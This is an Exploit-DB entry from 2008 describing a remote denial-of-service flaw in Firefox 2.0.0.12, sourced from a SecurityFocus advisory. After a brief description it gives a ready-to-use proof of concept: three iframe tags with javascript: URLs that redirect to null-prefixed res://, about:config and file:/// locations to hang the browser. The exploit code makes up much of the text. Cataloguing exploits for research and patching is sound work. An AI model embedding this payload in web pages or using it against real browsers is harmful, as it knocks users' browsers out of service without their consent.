Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service

EDB-ID:

31203

CVE:

N/A




Platform:

Multiple

Date:

2008-02-15


source: https://www.securityfocus.com/bid/27812/info

Mozilla Firefox is prone to a remote denial-of-service vulnerability because of the way the browser handles IFrames.

Attackers can exploit this issue to make the browser unresponsive and cause denial-of-service conditions.

Firefox 2.0.0.12 is vulnerable; other versions may also be affected. 

<iframe id="x" src="javascript:document.location='\x00res://'" width="100%" height="200"></iframe>
<iframe id="y" src="javascript:document.location='\x00about:config'" width="100%" height="200"></iframe>
<iframe id="z" src="javascript:document.location='\x00file:///'" width="100%" height="200"></iframe>